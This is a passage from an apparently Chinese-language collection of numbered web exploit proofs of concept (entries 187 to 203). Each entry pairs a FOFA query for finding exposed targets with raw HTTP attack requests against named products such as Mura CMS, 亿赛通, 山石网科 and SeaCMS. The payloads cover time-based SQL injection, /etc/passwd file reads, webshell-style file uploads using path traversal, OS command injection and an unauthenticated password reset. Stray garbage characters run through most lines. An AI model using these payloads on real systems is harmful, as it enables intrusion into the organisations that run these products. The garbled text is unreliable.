. q, Z C- A" C1 C- |* L0 K' d3 UPOST /admin/pr_monitor/getting_index_data.php HTTP/1.12 @: {1 Y! t% M" o: S/ U, } h
Host: your-ip/ X6 J" b3 ^3 G6 j# {: C% ?# v5 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. B; v/ a/ H5 \" c! z9 V& a: o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.88 s; @- F8 g: z. O% ^/ T! s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 D& G% M& k3 k0 q4 Y t. G) {Accept-Encoding: gzip, deflate, l1 K; G9 d8 O1 n
Connection: close1 T* k5 E: X' Y
Content-Type: application/x-www-form-urlencoded$ r2 \1 X- `7 `! j
9 B, a+ E0 X3 _: a9 X4 R
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! k: `/ _ J0 |2 F. W2 W/ a) a
6 |) }/ ?( k7 |$ Y" Z0 l- D$ f. G' C; P
187. Mura CMS processAsyncObject SQL注入
, I' r' D9 U3 s0 k/ t. o6 @( K6 n/ [CVE-2024-32640
- R5 w/ ?/ M2 W9 EFOFA:"Mura CMS") v+ c5 Y% a; S! Y: ^
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
8 k/ H- W$ T& V1 v! D, ]8 mHost: your-ip/ [6 n# G+ v( Z, J% O8 ] T, O8 o
Content-Type: application/x-www-form-urlencoded; j& t: H0 a: k) I2 ]
3 G; Q4 p) D4 J1 L0 ^% h( h
Y* q3 O& n* R4 w+ jobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 @2 L& [7 D: p+ e% v* g
- }8 [" \4 Y$ H% m6 P
2 a# W @0 E6 Z3 r188. 叁体-佳会视频会议 attachment 任意文件读取! U9 T. v& _8 b7 h0 F& ?' @& F" l
version <= 3.9.7$ T' l$ E& _! x& A
FOFA:body="/system/get_rtc_user_defined_info?site_id"
. v3 C3 j$ I- WGET /attachment?file=/etc/passwd HTTP/1.13 e) ^ T5 y/ ^4 c
Host: your-ip; |( u2 R! O$ U/ p" j. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
I u" R( @' p& {6 N% C6 Y6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ Y7 g- S& s& x! w& qAccept-Encoding: gzip, deflate3 L' ]3 z* \9 c
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 H& p, H. l, K" X6 m) C" uConnection: close, X1 j1 \; ^: |' l$ f
# m+ K9 T V! K+ }
: F& z" V' l) _ P7 o189. 蓝网科技临床浏览系统 deleteStudy SQL注入8 T; E1 D) v) S' z
FOFA:app="LANWON-临床浏览系统"
+ F. a9 F* l, M. e4 h+ H8 UGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
/ g" R) H4 F9 l& \/ N( I( K% PHost: your-ip
$ N. p" Z( F CUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- L. H% N8 z3 Q E7 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) e0 K5 n: D& f+ s) F( B, e9 JAccept-Encoding: gzip, deflate
% {4 u# S3 Q- [0 ~- L2 }- B/ |% ]Accept-Language: zh-CN,zh;q=0.98 T \2 b7 q" H: t3 a' F
Connection: close1 c2 F9 o, o. V- C% l" h' `7 c; m
" I M& Q& H* I& }2 i/ l, V
: P9 a' _+ l+ F+ n/ @190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ U v+ B% {8 Y. z7 dFOFA:title=="短视频矩阵营销系统"
# P0 a$ e: {+ W5 a7 O9 SPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
& f& h- I5 I+ x9 T0 [6 D" f; v5 h/ MHost: your-ip
) }/ D& D! [; b6 \2 D4 X c% q- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36% {4 ?0 E# j8 G5 @2 k8 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 _! C" s0 c' S" u+ ]Content-Type: application/x-www-form-urlencoded
/ z3 m' e0 P# G' a; S& mAccept-Encoding: gzip, deflate
: T8 q s6 L: b$ S* B9 O) t3 ?" XAccept-Language: zh-CN,zh;q=0.9
$ i# @# X4 Y5 w7 q: l0 D7 D1 d4 j8 ]# ~& }
poi=file:///etc/passwd
2 D1 v5 P2 v5 O+ a+ M
' `1 k( y) c7 C* Y+ T: b! I# |
0 T5 p6 p. O# b& [2 ~( f191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
" B& m: G+ V" j5 [" L" l! t4 VFOFA:body="/CDGServer3/index.jsp"; N& @6 |% q. w) B
POST /CDGServer3/js/../NavigationAjax HTTP/1.12 }" B$ ^6 Y# ]$ M, f( o6 t' ]: y& J7 ]
Host: your-ip* L; D% B/ J3 v, W: P {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 j, t. t8 |6 ]6 A" Z; |Content-Type: application/x-www-form-urlencoded/ Q% g/ e9 c) K; T
4 o3 ?/ l G$ p% Z, c
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
4 F7 }6 t! G$ d9 Z/ c7 _
5 U- W( D1 B% |( F2 K$ s2 Q) |7 q# h+ O$ L8 z
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
6 O: q. r. B7 m2 f) n- y0 K1 ]FOFA:title="用户登录_富通天下外贸ERP"
5 {2 r9 K6 ]' D$ v5 YPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
* P" `. ~! \3 `# fHost: your-ip
6 a* t% _ ?! E7 ~& b: e2 H' {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
: A" J( d. X. I% k' |Content-Type: application/x-www-form-urlencoded2 z5 v# q, ?( |$ O
9 K0 P3 G' K! D: W
2 m. W% C6 N, c. q: \1 }/ z* x<% @ webhandler language="C#" class="AverageHandler" %>
$ N& R8 ^1 n. m' @ Jusing System;
+ S# W8 |0 b# _+ Kusing System.Web;5 r$ m0 X4 `, G& O5 J/ g, ^
public class AverageHandler : IHttpHandler+ N. n" x$ S# o _5 |
{
' N9 n1 F0 k, G* t. upublic bool IsReusable, ~: Z- _8 Q, H2 s2 c3 \* ?) p$ e
{ get { return true; } }' t5 D3 N8 K( W- K. M, }7 U
public void ProcessRequest(HttpContext ctx)7 n, W" V w. |3 k( g3 `
{
4 s' }& S$ ~2 ?" r6 u1 Ictx.Response.Write("test");
, H9 H. C6 \' ^6 K; k& P7 K}
Z0 ^$ J, F3 t& i3 K8 w0 e}6 u% B* p" ^" g
/ D1 N7 y, T: U; `1 Y* Z* m9 g) v
1 ?+ {/ R) {6 l) s
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行$ e( _; H. d) l3 @" t* O) B
FOFA:body="山石云鉴主机安全管理系统"
8 E! t6 Z% p/ K' I, p: {& eGET /master/ajaxActions/getTokenAction.php HTTP/1.1
) z( ~. W- c0 t% u% z# Z8 o* t' B2 WHost:
/ K3 Z0 P) p! f% t. ZCookie: PHPSESSID=2333333333333;, p, b" B: v* Z" M1 N5 l9 ^
Content-Type: application/x-www-form-urlencoded" g) ^$ w; G- K3 N5 E
User-Agent: Mozilla/5.0% V% I! r# g6 Y, z1 l
3 _9 J1 E4 L$ D: o0 n& v* t% L
2 g1 q# u4 J* W$ rPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1( G, a. A2 b% N0 n$ q! J) M' k" d+ ]
Host:
" P, D! X7 O. i) zUser-Agent: Mozilla/5.0 f( e. x' Y$ y4 L9 R& m/ _
Accept-Encoding: gzip, deflate1 o. {( N9 X$ M7 O7 H. ]. j
Accept: */*6 {/ v" j$ L/ H! [) _' F; j
Connection: close8 u3 e$ h8 Q9 n
Cookie: PHPSESSID=2333333333333;
0 l; t! Z# w$ j3 X3 sContent-Type: application/x-www-form-urlencoded$ i! J% O2 ?7 c
Content-Length: 84' Y( t, r+ I- f8 P
, i/ s) [' C# b: x7 a. Z: }- u
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
" {0 e; M( X5 ?9 a! H
- h& h+ Z& V( ~! p1 A! Q) Y' ^; i5 f) q6 U* F- T4 q; T4 q y" P
GET /master/img/config HTTP/1.1- j. }( p6 u' A7 x! m3 W3 g0 U
Host:) f% b6 a! j4 P a# o
User-Agent: Mozilla/5.0
5 D& s# n& ?6 P' M/ c, r3 z e+ o# W
8 Y3 t9 r1 M# n( P& n5 Q- `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传! H9 w7 ?9 g0 p
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在3 `# k8 M3 V; U" x
( k M* ^. U: S; v6 l' f& f v) mPOST /servlet/uploadAttachmentServlet HTTP/1.1) |7 h' D+ U8 z0 `2 l
Host: host1 e4 {$ F& t2 O8 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36$ P2 \* F3 h% D1 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 a) L% Z1 h2 N- nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. C, \$ a4 E, U0 z! I* MAccept-Encoding: gzip, deflate0 g" b+ ^+ ^' n( ?
Connection: close7 c( k3 U) S' U* D& i, M* ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk; H5 O7 J" }5 ?" f4 V3 ?
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
' E9 k% |' z; A' y# R$ o$ a2 v& y! E4 J5 L7 M
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
' u4 F, c* H R* Y0 @5 @8 XContent-Type: text/plain
( r2 a* G7 N) M0 U5 U% u+ u' h( ~<% out.println("hello");%>
3 _ R* }5 D: d------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 j. Z; E* U6 n3 { n5 c9 J2 I
Content-Disposition: form-data; name="json"
) I8 W; _1 n K& y7 ?2 U8 I7 m+ u# V {"iq":{"query":{"UpdateType":"mail"}}}
* n# T i5 ?9 L5 y/ m------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
& f+ r* A* N5 V8 t( x& i6 U9 w3 t5 e; Z+ O0 S$ J4 L! V M5 C
. c' E6 ^# G1 A5 m1 M& S
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
( b1 i: y; h4 U3 z J+ SFOFA:title=="飞鱼星企业级智能上网行为管理系统
8 d; l: r# i6 L1 v2 n5 q: J$ T, `POST /send_order.cgi?parameter=operation HTTP/1.1
5 Q ^" ^: g5 e2 o0 zHost: 127.0.0.1& [: Y% Q8 S1 ^- M: ]
Pragma: no-cache$ ?3 R' o* o% B# @) S* h
Cache-Control: no-cache t' ?% c5 y G0 K% P7 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
4 T4 W9 k7 L' `3 K FAccept: */*
4 L7 e7 w1 e- _+ SAccept-Encoding: gzip, deflate; J/ K! w* r2 e! z# H- H3 z
Accept-Language: zh-CN,zh;q=0.9( @+ N2 D& d$ E/ w& R: b1 z
Connection: close) ^9 R/ p d8 s! s% A8 p
Content-Type: application/x-www-form-urlencoded# b/ Q: }) g* c! u, V
Content-Length: 68
+ A6 H3 r. b9 w! W" D
# [# d' s5 F5 c5 E{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
: O$ r$ }8 C& h) v& s
. {* B& {$ ~% ~3 r. E, a! x# @6 K1 l
2 A! N4 g- V. Q( k" C+ w196. 河南省风速科技统一认证平台密码重置 T2 n* Y% w1 s4 Y: b! o
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
- _" f3 g. H o- TPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
! q2 r0 u2 O) X1 N) G2 Z. s; eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
7 P/ A& @4 } EContent-Type: application/json;charset=UTF-8, r* f r& o$ g
X-Requested-With: XMLHttpRequest4 @4 ]8 Q' W. p$ J0 U5 C
Host:1 p2 T" T ~2 A" Z+ L
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
# q% G) V( \( v( y9 vContent-Length: 456 y; }" \2 d9 U% H2 x
Connection: close# ^" e! S! K5 E+ b$ I( M0 P0 s8 I3 h
6 Y$ Z. ?, T# z1 P6 x, `% a) Z; k{"xgh":"test","newPass":"test666","email":""}
) e/ A7 h5 ~4 `: O8 I9 E# ]; A+ \4 t7 k& T5 T
% m9 B k1 D1 J4 f4 S
9 x9 O: X# Y6 H1 U& S; i
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 L! ]0 q& G" O7 Z
FOFA:app="浙大恩特客户资源管理系统"2 z! _7 r3 g3 p- Q3 N6 z1 y S
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
0 i i3 X% d! `/ aHost:
! h6 l6 |; H6 ~) X/ }! k2 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36+ b+ \# x( W' K. F
Accept-Encoding: gzip, deflate
6 Q% {" ~* m9 X- m% F8 yConnection: close% ?: T; M! b3 u @- Q, l3 t* A
$ h" O+ T/ W3 X. B+ ]
+ i! j* e, I3 Z8 }' S/ E) ~
9 n! y; {. R4 V' L198. 阿里云盘 WebDAV 命令注入
: |) t+ t' w b* z2 [CVE-2024-296406 D# h4 F7 Q2 T) [$ z/ l( W R
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
' t6 a+ A" r9 {( u; K, NCookie: sysauth=41273cb2cffef0bb5d0653592624cf64" M( h! P: h8 a$ }, `) ^: x
Accept: */*
' e5 B+ f- r# O7 F) V2 rAccept-Encoding: gzip, deflate
) R( S& ~- S7 ?% U+ }3 LAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
/ X2 w$ F) x( A, l' o: }Connection: close
5 w' n/ F/ D; @1 c
4 Q$ @3 V7 @# s) a% \- u; k& v, x" V6 S2 m
199. cockpit系统assetsmanager_upload接口 文件上传
; g: N6 v. i# ^( x, d/ d; u W: ^0 @% x* m& k
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
5 p- o% J4 X( J" v+ n6 RGET /auth/login?to=/ HTTP/1.1" L I! o5 @& k2 ~% y# g* p+ L
' H% m' R. v- I响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw") U+ P0 ?" x H p- l
, F! G$ c' N: \5 x! A2 j7 b
2.使用刚才上一步获取到的jwt获取cookie:! \ ?/ T# K2 y' K
/ z4 e1 I# J6 E9 D! V o% iPOST /auth/check HTTP/1.1
C7 c4 O. @4 E( {8 p- RContent-Type: application/json
! v8 ~& j6 G# `. [& u
3 a# [; m- x# G9 i: h5 c# k{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
% _, b5 e: M9 Q: w- q& T$ d3 ]4 R& p# u
响应:200,返回值:! r/ a. j, W* E, U( x
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/9 T* d* ?, \# H7 }/ l6 T
Fofa:title="Authenticate Please!"
. @% b. V& [5 b6 L4 gPOST /assetsmanager/upload HTTP/1.1
- Q8 V& O- N' fContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
' |$ n+ r. H4 O L+ |2 GCookie: mysession=95524f01e238bf51bb60d77ede3bea92
. r5 D+ i# w$ o7 c2 G4 M/ Q' I; `* ^3 ^9 h4 k
-----------------------------36D28FBc36bd6feE7Fb3
, G! y7 v; w' `3 j: M; AContent-Disposition: form-data; name="files[]"; filename="tttt.php"
/ Z1 K9 z- T1 g" W# y- i4 c# eContent-Type: text/php
4 x& X6 }9 z/ W/ @3 I |
* n3 b* r% P. @) {+ W<?php echo "tttt";unlink(__FILE__);?> k& B* I) N& m* Q ?% [ P/ Z# T# {
-----------------------------36D28FBc36bd6feE7Fb3
5 i! x) e& m6 X5 x# fContent-Disposition: form-data; name="folder"# i* t6 l/ Q8 v1 y6 k' v: A$ d
' C- p) ]6 @0 A$ z9 l! `" L-----------------------------36D28FBc36bd6feE7Fb3--
9 A$ `2 Q4 \, R- }6 @/ K
+ @% a/ v; e3 L& |3 Q$ J$ t8 `7 j1 B m9 L, l; p
/storage/uploads/tttt.php
8 i3 t" d2 H; K1 S" {3 N3 w+ b. R4 L" {( X' i* B- O$ l
200. SeaCMS海洋影视管理系统dmku SQL注入0 w& c. X" e4 @
FOFA:app="海洋CMS"
' Z0 m f( B U' gGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1. F) f& R& E* z9 U$ O8 |9 A8 \
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
0 H, K$ @6 D) I. w1 ?Upgrade-Insecure-Requests: 1
* R* N5 \& T& w( S( iCache-Control: max-age=0
/ Q0 k% \8 F6 p: d' \0 D& QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ f& n( W" V8 j0 n9 c4 ?6 @
Accept-Encoding: gzip, deflate% N" l6 o* k) Z5 J( o2 U4 M: `
Accept-Language: zh-CN,zh;q=0.96 d' x1 u6 [! Y+ U6 G
, ?( B: ?8 {+ g: {
4 _0 g3 |1 q% X( d; ~' u% T# Z
201. 方正全媒体新闻采编系统 binary SQL注入
: Z+ a. U6 J" O9 m/ ~" jFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% Y3 q: J) `" K. w/ o8 t" [) [- wPOST /newsedit/newsplan/task/binary.do HTTP/1.1' h+ G! n5 m3 @3 K/ u8 W+ T
Content-Type: application/x-www-form-urlencoded3 ]7 n! ^8 D0 w- ?, }5 E$ Y( i+ x$ t- `1 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) `- X6 l3 q1 d/ u1 M8 Q+ {. e1 TAccept-Encoding: gzip, deflate2 t; B4 u, a' K# D4 ~/ |+ i
Accept-Language: zh-CN,zh;q=0.9
' u& X9 y1 t. y; F4 d- P. WConnection: close/ f! N5 U. I, B5 K4 g# p
# w# T2 ^% g( j* h1 WTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
; V& o; H2 p% `9 ]) D* o
+ q. w% n6 p ~; d C$ W& j0 s7 T. t
202. 微擎系统 AccountEdit任意文件上传
! }* v% B- c+ T7 l9 _5 h5 CFOFA:body="/Widgets/WidgetCollection/"# r% h0 M9 A9 [ j% a$ I
获取__VIEWSTATE和__EVENTVALIDATION值
9 O( M& J5 n5 @& _2 l# _2 SGET /User/AccountEdit.aspx HTTP/1.1) @* p1 r$ B2 s: m2 I# D5 E& ~
Host: 滑板人之家3 c" h) z6 @/ o- x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
! l/ K `$ l% @8 j" ?0 U' LContent-Length: 0" H9 R* U: \ J9 l+ g$ u/ E
1 c- K9 X4 W6 {
c! w" I3 p3 D" P/ D, @" M替换__VIEWSTATE和__EVENTVALIDATION值
% H: T4 P3 P0 Z6 v1 x6 N+ qPOST /User/AccountEdit.aspx HTTP/1.1+ \9 z2 Q8 |7 e* q3 P
Accept-Encoding: gzip, deflate, br/ q! F3 ?. M9 F5 M
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687! o1 U* u! P1 ]& @9 ^9 \
# _* }3 P5 p% U E" l5 |) g
-----------------------------786435874t38587593865736587346567358735687' B8 e7 I1 t4 s4 A, z* o8 t
Content-Disposition: form-data; name="__VIEWSTATE"$ T4 m1 o( O, c0 Y
7 @- _7 V/ E, c6 T+ d
__VIEWSTATE
$ [1 B, X6 I2 X-----------------------------786435874t38587593865736587346567358735687- S; P# c9 j$ M1 n$ U
Content-Disposition: form-data; name="__EVENTVALIDATION"
' g- D6 F' m% s* n( M- ~' H% p/ \) J* Y+ H
__EVENTVALIDATION
5 p7 @ i$ x( R: ]3 `* H) h9 t, q( u6 k-----------------------------786435874t38587593865736587346567358735687
6 [; u$ G0 L, H- R; n3 Z, p' K; VContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"8 ^9 r! c3 e# z) I: q) V
Content-Type: text/plain
7 A4 A9 Z7 A/ |3 I: @9 M) o5 @4 c! ]1 u( z) G
Hello World!
9 a2 d& U2 X* D/ j, n1 U0 R-----------------------------786435874t38587593865736587346567358735687
. M: S* J' W- wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"$ c: n' i( O5 t, ]8 m1 m
" w5 L2 t4 G4 b: c% v2 ~
上传图片
6 z, x [4 f8 B9 T2 ~; C/ F-----------------------------786435874t38587593865736587346567358735687& H* R; N. `& M! k( \
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
L# e% A4 f1 a; J5 [9 ?2 S6 `
9 s/ e4 m* B1 \+ u- _: G0 U- }/ T3 h
+ F$ |3 P! k6 h5 z4 O% R-----------------------------786435874t38587593865736587346567358735687# q/ \) T% h; k7 f+ t8 l: n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
; U# q. R5 n5 q- ^1 B' I" U, J# F& a1 x" N! t
' U" Y7 R+ b& E* I-----------------------------786435874t38587593865736587346567358735687--( ~& X( A2 t: F# ?6 g5 I- J
3 X1 H& t. W1 E% C/ E% x5 d0 F2 h+ n( [ u, @
/_data/Uploads/1123.txt) b9 P. r4 L) I$ _0 l% d9 Q. R
( f: W. [# J# V Y4 `
203. 红海云EHR PtFjk 文件上传9 p/ l' L4 [* }4 [& N
FOFA:body="RedseaPlatform"
+ X# t: }+ J5 c( t& } t3 nPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
" F" V& D5 D% g9 p+ G0 AHost: x.x.x.x
+ R1 x/ R2 q2 P6 j$ i+ \Accept-Encoding: gzip
5 W b8 r9 J: h) ]' gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: n% S2 ~# C) j+ }Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4/ J+ t' S- Z7 f/ I# \2 N9 l
Content-Length: 210
3 g) n3 w5 a& e' f# O/ N4 t" F9 Z( d3 V) c: T
------WebKitFormBoundaryt7WbDl1tXogoZys4# c" v- J) @! T) h( c/ p' B! ]
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
3 |. ~: m/ h2 e) P5 q& V2 A/ vContent-Type:image/jpeg
; }% J! p: M# t; ` u
; R0 r) G1 ?" q$ P# Q6 D<% out.print("hello,eHR");%>- n" D b3 F( y+ l' E
------WebKitFormBoundaryt7WbDl1tXogoZys4--9 v: a2 I6 v5 ~' ^
6 T! Q" f2 X a6 |. M8 ^
" _9 j; G9 [" N! ^# }
& ?8 f. P3 h' Z# U8 ?- E X
$ f8 }6 B q3 u3 e! Q' H; j& ?4 a y& k! t: Q8 @
, y, T$ m, f+ f w# D4 H) r |